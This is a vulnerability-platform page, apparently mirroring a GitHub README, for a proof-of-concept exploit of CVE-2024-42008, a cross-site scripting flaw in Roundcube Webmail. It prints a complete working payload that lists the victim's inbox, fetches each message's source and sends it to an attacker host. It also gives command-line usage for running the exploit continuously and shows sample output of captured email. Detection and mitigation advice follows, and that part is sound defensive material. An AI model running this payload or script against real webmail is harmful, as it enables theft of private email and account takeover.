漏洞平台

POC详情： 92b54095ef59803fafcfba6275d9bb23a02b277c

来源

https://github.com/rpgsec/Roundcube-CVE-2024-42008-POC

关联漏洞

标题： Roundcube Webmail 安全漏洞 (CVE-2024-42008)
描述：Roundcube Webmail是一款基于浏览器的开源IMAP客户端，它支持地址薄管理、信息搜索、拼写检查等。 Roundcube Webmail 1.5.7及之前版本和1.6.8之前的1.6.x版本存在安全漏洞，该漏洞源于存在跨站脚本漏洞，远程攻击者可以通过带有危险Content-Type标头的恶意电子邮件附件窃取和发送受害者的电子邮件。

介绍

# CVE-2024-42008 RoundCube XSS Exploit

## Overview

This repository contains a proof-of-concept exploit for **CVE-2024-42008**, a Cross-Site Scripting (XSS) vulnerability in RoundCube webmail application. This exploit is designed for educational purposes and controlled penetration testing environments like HackTheBox.

## Vulnerability Details

### CVE-2024-42008 Summary
- **CVE ID**: CVE-2024-42008
- **Type**: Cross-Site Scripting (XSS)
- **CVSS Score**: High
- **Affected Versions**: 
  - RoundCube ≤ 1.5.7
  - RoundCube 1.6.x ≤ 1.6.7
- **Fixed Versions**: 1.5.8, 1.6.8+

### Technical Details

The vulnerability exists in `rcmail_action_mail_get->run()` and allows remote attackers to execute arbitrary JavaScript in victims' browsers. The flaw stems from insufficient input validation when processing email content, particularly in handling CSS animations and JavaScript execution contexts.

**Key Attack Vector:**
- Malicious HTML content injected via contact forms or email messages
- CSS animation properties used to trigger JavaScript execution
- `onanimationstart` event handlers bypass content filters
- JavaScript payload executes in the context of the webmail application

### Impact

Successful exploitation allows attackers to:
- **Steal victim's emails** from INBOX and other folders
- **Exfiltrate email metadata** (UIDs, message lists)
- **Access email source code** and attachments
- **Send emails** from victim's account
- **Harvest login credentials** and session tokens
- **Perform actions** on behalf of the victim

## Exploit Script Analysis

### Script Architecture

The exploit consists of three main components:

1. **XSS Payload Delivery**: Sends malicious HTML via contact form
2. **HTTP Server**: Listens for exfiltrated data
3. **Data Processing**: Captures and logs stolen emails

### Payload Breakdown

```javascript
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. Fetch email list from victim's INBOX
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. Extract email UIDs using regex
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. For each email, fetch full source
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. Exfiltrate email data to attacker server
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">
```

### Key Features

- **Continuous Operation**: Can send payloads at regular intervals
- **Stealth Mode**: Minimal footprint and error handling
- **Data Logging**: Automatic capture and storage of exfiltrated emails
- **Debug Mode**: Proxy support for traffic analysis
- **Configurable**: Multiple command-line options

## Usage

### Prerequisites
```bash
pip install requests
```

### Basic Usage
```bash
# Single payload delivery
python cve-2024-42008-exploit.py

# Continuous mode (every 30 seconds)
python cve-2024-42008-exploit.py -c

# Custom interval (every 60 seconds)
python cve-2024-42008-exploit.py -c -i 60

# Debug mode with proxy
python cve-2024-42008-exploit.py -d
```

### Configuration

Edit the script to configure:
- `ATTACKER_IP`: Your listening server IP
- `ATTACKER_PORT`: Port for receiving exfiltrated data
- `RECIPIENT_EMAIL`: Target email address
- `TARGET_URL`: Vulnerable RoundCube instance
- `PROXY`: Proxy server for debugging (Burp Suite/Caido)

### Command Line Options

| Option | Description |
|--------|-------------|
| `-d, --debug` | Enable debug mode with proxy support |
| `-c, --continuous` | Send payloads continuously |
| `-i, --interval` | Interval between payloads (default: 30s) |

## Attack Flow

1. **Payload Injection**: Script sends malicious HTML via contact form
2. **Email Delivery**: Vulnerable RoundCube processes and delivers email
3. **Victim Interaction**: User opens/views the malicious email
4. **XSS Execution**: CSS animation triggers JavaScript payload
5. **Data Exfiltration**: JavaScript steals emails and sends to attacker
6. **Data Capture**: Exploit server receives and logs stolen data

## Detection and Mitigation

### For Defenders

**Detection Indicators:**
- Unusual CSS animation properties in email content
- `onanimationstart` event handlers in HTML
- Suspicious JavaScript in email messages
- Outbound requests to unknown domains from webmail
- Repeated contact form submissions

**Mitigation Strategies:**
- Update RoundCube to version 1.5.8 or 1.6.8+
- Implement Content Security Policy (CSP)
- Enable email content filtering
- Monitor for suspicious outbound traffic
- Regular security audits of webmail configurations

### For Penetration Testers

**Testing Considerations:**
- Ensure proper authorization before testing
- Document all activities for reporting
- Test in isolated environments only
- Verify target is intentionally vulnerable
- Follow responsible disclosure practices

## Legal and Ethical Considerations

⚠️ **WARNING**: This exploit is provided for educational and authorized testing purposes only.

- Only use on systems you own or have explicit permission to test
- Designed for HackTheBox and similar learning platforms
- Unauthorized use may violate local and international laws
- Always follow responsible disclosure practices
- Respect privacy and data protection regulations

## Technical References

- [CVE-2024-42008 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42008)
- [RoundCube Security Advisory](https://roundcube.net/news/2024/08/04/security-updates-1.6.8-and-1.5.8)
- [CWE-79: Cross-site Scripting](https://cwe.mitre.org/data/definitions/79.html)

## Output Example

```
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <admin@example.com>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log
```

## Disclaimer

This code is provided for educational purposes and authorized penetration testing only. The authors are not responsible for any misuse or damage caused by this software. Always ensure you have proper authorization before testing any system.

文件快照


 [4.0K]  /data/pocs/92b54095ef59803fafcfba6275d9bb23a02b277c
├── [6.3K]  README.md
└── [4.4K]  script.py

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。